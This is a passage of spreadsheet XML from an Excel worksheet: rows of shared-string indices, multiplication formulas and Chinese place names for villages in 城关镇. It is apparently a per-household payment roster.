      </c>
      <c r="F600" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G600" s="14">
        <v>1</v>
      </c>
      <c r="H600" s="14">
        <v>340</v>
      </c>
      <c r="I600" s="14">
        <f>H600*G600</f>
        <v>340</v>
      </c>
      <c r="J600" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K600" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="601" ht="23" customHeight="1" spans="1:11">
      <c r="A601" s="13" t="s">
        <v>1647</v>
      </c>
      <c r="B601" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C601" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D601" s="14" t="s">
        <v>1648</v>
      </c>
      <c r="E601" s="14" t="s">
        <v>222</v>
      </c>
      <c r="F601" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G601" s="14">
        <v>1</v>
      </c>
      <c r="H601" s="14">
        <v>340</v>
      </c>
      <c r="I601" s="14">
        <f>H601*G601</f>
        <v>340</v>
      </c>
      <c r="J601" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K601" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="602" ht="23" customHeight="1" spans="1:11">
      <c r="A602" s="13" t="s">
        <v>1649</v>
      </c>
      <c r="B602" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C602" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D602" s="14" t="s">
        <v>1650</v>
      </c>
      <c r="E602" s="14" t="s">
        <v>551</v>
      </c>
      <c r="F602" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G602" s="14">
        <v>2</v>
      </c>
      <c r="H602" s="14">
        <v>300</v>
      </c>
      <c r="I602" s="14">
        <f>H602*G602</f>
        <v>600</v>
      </c>
      <c r="J602" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K602" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="603" ht="23" customHeight="1" spans="1:11">
      <c r="A603" s="13" t="s">
        <v>1651</v>
      </c>
      <c r="B603" s="14" t="str">
        <f>B602</f>
        <v>城关镇</v>
      </c>
      <c r="C603" s="14" t="str">
        <f>C602</f>
        <v>城关镇西北村</v>
      </c>
      <c r="D603" s="18" t="s">
        <v>1652</v>
      </c>
      <c r="E603" s="18" t="s">
        <v>1653</v>
      </c>
      <c r="F603" s="14" t="str">
        <f>F602</f>
        <v>4113210106</v>
      </c>
      <c r="G603" s="14"/>
      <c r="H603" s="14"/>
      <c r="I603" s="14"/>
      <c r="J603" s="14"/>
      <c r="K603" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="604" ht="23" customHeight="1" spans="1:11">
      <c r="A604" s="13" t="s">
        <v>1654</v>
      </c>
      <c r="B604" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C604" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D604" s="14" t="s">
        <v>1655</v>
      </c>
      <c r="E604" s="14" t="s">
        <v>320</v>
      </c>
      <c r="F604" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G604" s="14">
        <v>1</v>
      </c>
      <c r="H604" s="14">
        <v>340</v>
      </c>
      <c r="I604" s="14">
        <f t="shared" ref="I604:I615" si="25">H604*G604</f>
        <v>340</v>
      </c>
      <c r="J604" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K604" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="605" ht="23" customHeight="1" spans="1:11">
      <c r="A605" s="13" t="s">
        <v>1656</v>
      </c>
      <c r="B605" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C605" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D605" s="14" t="s">
        <v>1657</v>
      </c>
      <c r="E605" s="14" t="s">
        <v>548</v>
      </c>
      <c r="F605" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G605" s="14">
        <v>1</v>
      </c>
      <c r="H605" s="14">
        <v>340</v>
      </c>
      <c r="I605" s="14">
        <f t="shared" si="25"/>
        <v>340</v>
      </c>
      <c r="J605" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K605" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="606" ht="23" customHeight="1" spans="1:11">
      <c r="A606" s="13" t="s">
        <v>1658</v>
      </c>
      <c r="B606" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C606" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D606" s="14" t="s">
        <v>1659</v>
      </c>
      <c r="E606" s="14" t="s">
        <v>1660</v>
      </c>
      <c r="F606" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G606" s="14">
        <v>1</v>
      </c>
      <c r="H606" s="14">
        <v>340</v>
      </c>
      <c r="I606" s="14">
        <f t="shared" si="25"/>
        <v>340</v>
      </c>
      <c r="J606" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K606" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="607" ht="23" customHeight="1" spans="1:11">
      <c r="A607" s="13" t="s">
        <v>1661</v>
      </c>
      <c r="B607" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C607" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D607" s="14" t="s">
        <v>1662</v>
      </c>
      <c r="E607" s="14" t="s">
        <v>1663</v>
      </c>
      <c r="F607" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G607" s="14">
        <v>1</v>
      </c>
      <c r="H607" s="14">
        <v>340</v>
      </c>
      <c r="I607" s="14">
        <f t="shared" si="25"/>
        <v>340</v>
      </c>
      <c r="J607" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K607" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="608" ht="23" customHeight="1" spans="1:11">
      <c r="A608" s="13" t="s">
        <v>1664</v>
      </c>
      <c r="B608" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C608" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D608" s="14" t="s">
        <v>1665</v>
      </c>
      <c r="E608" s="14" t="s">
        <v>1666</v>
      </c>
      <c r="F608" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G608" s="14">
        <v>1</v>
      </c>
      <c r="H608" s="14">
        <v>340</v>
      </c>
      <c r="I608" s="14">
        <f t="shared" si="25"/>
        <v>340</v>
      </c>
      <c r="J608" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K608" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="609" ht="23" customHeight="1" spans="1:11">
      <c r="A609" s="13" t="s">
        <v>1667</v>
      </c>
      <c r="B609" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C609" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D609" s="14" t="s">
        <v>1668</v>
      </c>
      <c r="E609" s="14" t="s">
        <v>1300</v>
      </c>
      <c r="F609" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G609" s="14">
        <v>1</v>
      </c>
      <c r="H609" s="14">
        <v>340</v>
      </c>
      <c r="I609" s="14">
        <f t="shared" si="25"/>
        <v>340</v>
      </c>
      <c r="J609" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K609" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="610" ht="23" customHeight="1" spans="1:11">
      <c r="A610" s="13" t="s">
        <v>1669</v>
      </c>
      <c r="B610" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C610" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D610" s="14" t="s">
        <v>1670</v>
      </c>
      <c r="E610" s="14" t="s">
        <v>1671</v>
      </c>
      <c r="F610" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G610" s="14">
        <v>1</v>
      </c>
      <c r="H610" s="14">
        <v>340</v>
      </c>
      <c r="I610" s="14">
        <f t="shared" si="25"/>
        <v>340</v>
      </c>
      <c r="J610" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K610" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="611" ht="23" customHeight="1" spans="1:11">
      <c r="A611" s="13" t="s">
        <v>1672</v>
      </c>
      <c r="B611" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C611" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D611" s="14" t="s">
        <v>1673</v>
      </c>
      <c r="E611" s="14" t="s">
        <v>249</v>
      </c>
      <c r="F611" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G611" s="14">
        <v>1</v>
      </c>
      <c r="H611" s="14">
        <v>340</v>
      </c>
      <c r="I611" s="14">
        <f t="shared" si="25"/>
        <v>340</v>
      </c>
      <c r="J611" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K611" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="612" ht="23" customHeight="1" spans="1:11">
      <c r="A612" s="13" t="s">
        <v>1674</v>
      </c>
      <c r="B612" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C612" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D612" s="14" t="s">
        <v>1675</v>
      </c>
      <c r="E612" s="14" t="s">
        <v>1676</v>
      </c>
      <c r="F612" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G612" s="14">
        <v>1</v>
      </c>
      <c r="H612" s="14">
        <v>340</v>
      </c>
      <c r="I612" s="14">
        <f t="shared" si="25"/>
        <v>340</v>
      </c>
      <c r="J612" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K612" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="613" ht="23" customHeight="1" spans="1:11">
      <c r="A613" s="13" t="s">
        <v>1677</v>
      </c>
      <c r="B613" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C613" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D613" s="14" t="s">
        <v>1678</v>
      </c>
      <c r="E613" s="14" t="s">
        <v>1679</v>
      </c>
      <c r="F613" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G613" s="14">
        <v>1</v>
      </c>
      <c r="H613" s="14">
        <v>340</v>
      </c>
      <c r="I613" s="14">
        <f t="shared" si="25"/>
        <v>340</v>
      </c>
      <c r="J613" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K613" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="614" ht="23" customHeight="1" spans="1:11">
      <c r="A614" s="13" t="s">
        <v>1680</v>
      </c>
      <c r="B614" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C614" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D614" s="14" t="s">
        <v>1681</v>
      </c>
      <c r="E614" s="14" t="s">
        <v>1682</v>
      </c>
      <c r="F614" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G614" s="14">
        <v>1</v>
      </c>
      <c r="H614" s="14">
        <v>340</v>
      </c>
      <c r="I614" s="14">
        <f t="shared" si="25"/>
        <v>340</v>
      </c>
      <c r="J614" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K614" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="615" ht="23" customHeight="1" spans="1:11">
      <c r="A615" s="13" t="s">
        <v>1683</v>
      </c>
      <c r="B615" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C615" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D615" s="14" t="s">
        <v>1684</v>
      </c>
      <c r="E615" s="14" t="s">
        <v>1685</v>
      </c>
      <c r="F615" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G615" s="14">
        <v>2</v>
      </c>
      <c r="H615" s="14">
        <v>300</v>
      </c>
      <c r="I615" s="14">
        <f t="shared" si="25"/>
        <v>600</v>
      </c>
      <c r="J615" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K615" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="616" ht="23" customHeight="1" spans="1:11">
      <c r="A616" s="13" t="s">
        <v>1686</v>
      </c>
      <c r="B616" s="14" t="str">
        <f>B615</f>
        <v>城关镇</v>
      </c>
      <c r="C616" s="14" t="str">
        <f>C615</f>
        <v>西北村</v>
      </c>
      <c r="D616" s="19" t="s">
        <v>1687</v>
      </c>
      <c r="E616" s="19" t="s">
        <v>1688</v>
      </c>
      <c r="F616" s="14" t="str">
        <f>F615</f>
        <v>4113210106</v>
      </c>
      <c r="G616" s="14"/>
      <c r="H616" s="14"/>
      <c r="I616" s="14"/>
      <c r="J616" s="14"/>
      <c r="K616" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="617" ht="23" customHeight="1" spans="1:11">
      <c r="A617" s="13" t="s">
        <v>1689</v>
      </c>
      <c r="B617" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C617" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D617" s="14" t="s">
        <v>1690</v>
      </c>
      <c r="E617" s="14" t="s">
        <v>883</v>
      </c>
      <c r="F617" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G617" s="14">
        <v>1</v>
      </c>
      <c r="H617" s="14">
        <v>340</v>
      </c>
      <c r="I617" s="14">
        <f t="shared" ref="I617:I626" si="26">H617*G617</f>
        <v>340</v>
      </c>
      <c r="J617" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K617" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="618" ht="23" customHeight="1" spans="1:11">
      <c r="A618" s="13" t="s">
        <v>1691</v>
      </c>
      <c r="B618" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C618" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D618" s="14" t="s">
        <v>1692</v>
      </c>
      <c r="E618" s="14" t="s">
        <v>360</v>
      </c>
      <c r="F618" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G618" s="14">
        <v>1</v>
      </c>
      <c r="H618" s="14">
        <v>340</v>
      </c>
      <c r="I618" s="14">
        <f t="shared" si="26"/>
        <v>340</v>
      </c>
      <c r="J618" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K618" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="619" ht="23" customHeight="1" spans="1:11">
      <c r="A619" s="13" t="s">
        <v>1693</v>
      </c>
      <c r="B619" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C619" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D619" s="14" t="s">
        <v>1694</v>
      </c>
      <c r="E619" s="14" t="s">
        <v>385</v>
      </c>
      <c r="F619" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G619" s="14">
        <v>1</v>
      </c>
      <c r="H619" s="14">
        <v>340</v>
      </c>
      <c r="I619" s="14">
        <f t="shared" si="26"/>
        <v>340</v>
      </c>
      <c r="J619" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K619" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="620" ht="23" customHeight="1" spans="1:11">
      <c r="A620" s="13" t="s">
        <v>1695</v>
      </c>
      <c r="B620" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C620" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D620" s="14" t="s">
        <v>1696</v>
      </c>
      <c r="E620" s="14" t="s">
        <v>236</v>
      </c>
      <c r="F620" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G620" s="14">
        <v>1</v>
      </c>
      <c r="H620" s="14">
        <v>340</v>
      </c>
      <c r="I620" s="14">
        <f t="shared" si="26"/>
        <v>340</v>
      </c>
      <c r="J620" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K620" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="621" ht="23" customHeight="1" spans="1:11">
      <c r="A621" s="13" t="s">
        <v>1697</v>
      </c>
      <c r="B621" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C621" s="14" t="s">
        <v>1237</v>
      </c>
      <c r="D621" s="14" t="s">
        <v>1698</v>
      </c>
      <c r="E621" s="14" t="s">
        <v>1699</v>
      </c>
      <c r="F621" s="14" t="s">
        <v>1231</v>
      </c>
      <c r="G621" s="14">
        <v>1</v>
      </c>
      <c r="H621" s="14">
        <v>340</v>
      </c>
      <c r="I621" s="14">
        <f t="shared" si="26"/>
        <v>340</v>
      </c>
      <c r="J621" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K621" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="622" ht="23" customHeight="1" spans="1:11">
      <c r="A622" s="13" t="s">
        <v>1700</v>
      </c>
      <c r="B622" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C622" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D622" s="14" t="s">
        <v>1701</v>
      </c>
      <c r="E622" s="14" t="s">
        <v>1702</v>
      </c>
      <c r="F622" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G622" s="14">
        <v>1</v>
      </c>
      <c r="H622" s="14">
        <v>340</v>
      </c>
      <c r="I622" s="14">
        <f t="shared" si="26"/>
        <v>340</v>
      </c>
      <c r="J622" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K622" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="623" ht="23" customHeight="1" spans="1:11">
      <c r="A623" s="13" t="s">
        <v>1703</v>
      </c>
      <c r="B623" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C623" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D623" s="14" t="s">
        <v>1704</v>
      </c>
      <c r="E623" s="14" t="s">
        <v>320</v>
      </c>
      <c r="F623" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G623" s="14">
        <v>1</v>
      </c>
      <c r="H623" s="14">
        <v>340</v>
      </c>
      <c r="I623" s="14">
        <f t="shared" si="26"/>
        <v>340</v>
      </c>
      <c r="J623" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K623" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="624" ht="23" customHeight="1" spans="1:11">
      <c r="A624" s="13" t="s">
        <v>1705</v>
      </c>
      <c r="B624" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C624" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D624" s="14" t="s">
        <v>1706</v>
      </c>
      <c r="E624" s="14" t="s">
        <v>222</v>
      </c>
      <c r="F624" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G624" s="14">
        <v>1</v>
      </c>
      <c r="H624" s="14">
        <v>340</v>
      </c>
      <c r="I624" s="14">
        <f t="shared" si="26"/>
        <v>340</v>
      </c>
      <c r="J624" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K624" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="625" ht="23" customHeight="1" spans="1:11">
      <c r="A625" s="13" t="s">
        <v>1707</v>
      </c>
      <c r="B625" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C625" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D625" s="14" t="s">
        <v>1708</v>
      </c>
      <c r="E625" s="14" t="s">
        <v>584</v>
      </c>
      <c r="F625" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G625" s="14">
        <v>1</v>
      </c>
      <c r="H625" s="14">
        <v>340</v>
      </c>
      <c r="I625" s="14">
        <f t="shared" si="26"/>
        <v>340</v>
      </c>
      <c r="J625" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K625" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="626" ht="23" customHeight="1" spans="1:11">
      <c r="A626" s="13" t="s">
        <v>1709</v>
      </c>
      <c r="B626" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C626" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D626" s="14" t="s">
        <v>1710</v>
      </c>
      <c r="E626" s="14" t="s">
        <v>249</v>
      </c>
      <c r="F626" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G626" s="14">
        <v>2</v>
      </c>
      <c r="H626" s="14">
        <v>300</v>
      </c>
      <c r="I626" s="14">
        <f t="shared" si="26"/>
        <v>600</v>
      </c>
      <c r="J626" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K626" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="627" ht="23" customHeight="1" spans="1:11">
      <c r="A627" s="13" t="s">
        <v>1711</v>
      </c>
      <c r="B627" s="14" t="str">
        <f>B626</f>
        <v>城关镇</v>
      </c>
      <c r="C627" s="14" t="str">
        <f>C626</f>
        <v>东北村</v>
      </c>
      <c r="D627" s="18" t="s">
        <v>1712</v>
      </c>
      <c r="E627" s="19" t="s">
        <v>346</v>
      </c>
      <c r="F627" s="14" t="str">
        <f>F626</f>
        <v>4113210103</v>
      </c>
      <c r="G627" s="14"/>
      <c r="H627" s="14"/>
      <c r="I627" s="14"/>
      <c r="J627" s="14"/>
      <c r="K627" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="628" ht="23" customHeight="1" spans="1:11">
      <c r="A628" s="13" t="s">
        <v>1713</v>
      </c>
      <c r="B628" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C628" s="14" t="s">
        <v>1714</v>
      </c>
      <c r="D628" s="14" t="s">
        <v>1715</v>
      </c>
      <c r="E628" s="14" t="s">
        <v>1293</v>
      </c>
      <c r="F628" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G628" s="14">
        <v>2</v>
      </c>
      <c r="H628" s="14">
        <v>320</v>
      </c>
      <c r="I628" s="14">
        <f>H628*G628</f>
        <v>640</v>
      </c>
      <c r="J628" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K628" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="629" ht="23" customHeight="1" spans="1:11">
      <c r="A629" s="13" t="s">
        <v>1716</v>
      </c>
      <c r="B629" s="14" t="str">
        <f>B628</f>
        <v>城关镇</v>
      </c>
      <c r="C629" s="14" t="str">
        <f>C628</f>
        <v>城关西北</v>
      </c>
      <c r="D629" s="18" t="s">
        <v>1717</v>
      </c>
      <c r="E629" s="19" t="s">
        <v>607</v>
      </c>
      <c r="F629" s="14" t="str">
        <f>F628</f>
        <v>4113210106</v>
      </c>
      <c r="G629" s="14"/>
      <c r="H629" s="14"/>
      <c r="I629" s="14"/>
      <c r="J629" s="14"/>
      <c r="K629" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="630" ht="23" customHeight="1" spans="1:11">
      <c r="A630" s="13" t="s">
        <v>1718</v>
      </c>
      <c r="B630" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C630" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D630" s="14" t="s">
        <v>1719</v>
      </c>
      <c r="E630" s="14" t="s">
        <v>1720</v>
      </c>
      <c r="F630" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G630" s="14">
        <v>1</v>
      </c>
      <c r="H630" s="14">
        <v>340</v>
      </c>
      <c r="I630" s="14">
        <f>H630*G630</f>
        <v>340</v>
      </c>
      <c r="J630" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K630" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="631" ht="23" customHeight="1" spans="1:11">
      <c r="A631" s="13" t="s">
        <v>1721</v>
      </c>
      <c r="B631" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C631" s="14" t="s">
        <v>1722</v>
      </c>
      <c r="D631" s="14" t="s">
        <v>1723</v>
      </c>
      <c r="E631" s="14" t="s">
        <v>292</v>
      </c>
      <c r="F631" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G631" s="14">
        <v>1</v>
      </c>
      <c r="H631" s="14">
        <v>340</v>
      </c>
      <c r="I631" s="14">
        <f>H631*G631</f>
        <v>340</v>
      </c>
      <c r="J631" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K631" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="632" ht="23" customHeight="1" spans="1:11">
      <c r="A632" s="13" t="s">
        <v>1724</v>
      </c>
      <c r="B632" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C632" s="14" t="s">
        <v>1722</v>
      </c>
      <c r="D632" s="14" t="s">
        <v>1725</v>
      </c>
      <c r="E632" s="14" t="s">
        <v>883</v>
      </c>
      <c r="F632" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G632" s="14">
        <v>1</v>
      </c>
      <c r="H632" s="14">
        <v>340</v>
      </c>
      <c r="I632" s="14">
        <f>H632*G632</f>
        <v>340</v>
      </c>
      <c r="J632" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K632" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="633" ht="23" customHeight="1" spans="1:11">
      <c r="A633" s="13" t="s">
        <v>1726</v>
      </c>
      <c r="B633" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C633" s="14" t="s">
        <v>1722</v>
      </c>
      <c r="D633" s="14" t="s">
        <v>1727</v>
      </c>
      <c r="E633" s="14" t="s">
        <v>276</v>
      </c>
      <c r="F633" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G633" s="14">
        <v>2</v>
      </c>
      <c r="H633" s="14">
        <v>300</v>
      </c>
      <c r="I633" s="14">
        <f>H633*G633</f>
        <v>600</v>
      </c>
      <c r="J633" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K633" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="634" ht="23" customHeight="1" spans="1:11">
      <c r="A634" s="13" t="s">
        <v>1728</v>
      </c>
      <c r="B634" s="14" t="str">
        <f>B633</f>
        <v>城关镇</v>
      </c>
      <c r="C634" s="14" t="str">
        <f>C633</f>
        <v>城关中华</v>
      </c>
      <c r="D634" s="18" t="s">
        <v>1729</v>
      </c>
      <c r="E634" s="19" t="s">
        <v>1730</v>
      </c>
      <c r="F634" s="14" t="str">
        <f>F633</f>
        <v>4113210108</v>
      </c>
      <c r="G634" s="14"/>
      <c r="H634" s="14"/>
      <c r="I634" s="14"/>
      <c r="J634" s="14"/>
      <c r="K634" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="635" ht="23" customHeight="1" spans="1:11">
      <c r="A635" s="13" t="s">
        <v>1731</v>
      </c>
      <c r="B635" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C635" s="14" t="s">
        <v>1722</v>
      </c>
      <c r="D635" s="14" t="s">
        <v>1732</v>
      </c>
      <c r="E635" s="14" t="s">
        <v>1733</v>
      </c>
      <c r="F635" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G635" s="14">
        <v>1</v>
      </c>
      <c r="H635" s="14">
        <v>340</v>
      </c>
      <c r="I635" s="14">
        <f t="shared" ref="I635:I642" si="27">H635*G635</f>
        <v>340</v>
      </c>
      <c r="J635" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K635" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="636" ht="23" customHeight="1" spans="1:11">
      <c r="A636" s="13" t="s">
        <v>1734</v>
      </c>
      <c r="B636" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C636" s="14" t="s">
        <v>1722</v>
      </c>
      <c r="D636" s="14" t="s">
        <v>1735</v>
      </c>
      <c r="E636" s="14" t="s">
        <v>709</v>
      </c>
      <c r="F636" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G636" s="14">
        <v>1</v>
      </c>
      <c r="H636" s="14">
        <v>340</v>
      </c>
      <c r="I636" s="14">
        <f t="shared" si="27"/>
        <v>340</v>
      </c>
      <c r="J636" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K636" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="637" ht="23" customHeight="1" spans="1:11">
      <c r="A637" s="13" t="s">
        <v>1736</v>
      </c>
      <c r="B637" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C637" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D637" s="14" t="s">
        <v>1737</v>
      </c>
      <c r="E637" s="14" t="s">
        <v>334</v>
      </c>
      <c r="F637" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G637" s="14">
        <v>1</v>
      </c>
      <c r="H637" s="14">
        <v>340</v>
      </c>
      <c r="I637" s="14">
        <f t="shared" si="27"/>
        <v>340</v>
      </c>
      <c r="J637" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K637" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="638" ht="23" customHeight="1" spans="1:11">
      <c r="A638" s="13" t="s">
        <v>1738</v>
      </c>
      <c r="B638" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C638" s="14" t="s">
        <v>1739</v>
      </c>
      <c r="D638" s="14" t="s">
        <v>1740</v>
      </c>
      <c r="E638" s="14" t="s">
        <v>320</v>
      </c>
      <c r="F638" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G638" s="14">
        <v>1</v>
      </c>
      <c r="H638" s="14">
        <v>340</v>
      </c>
      <c r="I638" s="14">
        <f t="shared" si="27"/>
        <v>340</v>
      </c>
      <c r="J638" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K638" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="639" ht="23" customHeight="1" spans="1:11">
      <c r="A639" s="13" t="s">
        <v>1741</v>
      </c>
      <c r="B639" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C639" s="14" t="s">
        <v>1739</v>
      </c>
      <c r="D639" s="14" t="s">
        <v>1742</v>
      </c>
      <c r="E639" s="14" t="s">
        <v>1743</v>
      </c>
      <c r="F639" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G639" s="14">
        <v>1</v>
      </c>
      <c r="H639" s="14">
        <v>340</v>
      </c>
      <c r="I639" s="14">
        <f t="shared" si="27"/>
        <v>340</v>
      </c>
      <c r="J639" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K639" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="640" ht="23" customHeight="1" spans="1:11">
      <c r="A640" s="13" t="s">
        <v>1744</v>
      </c>
      <c r="B640" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C640" s="14" t="s">
        <v>1739</v>
      </c>
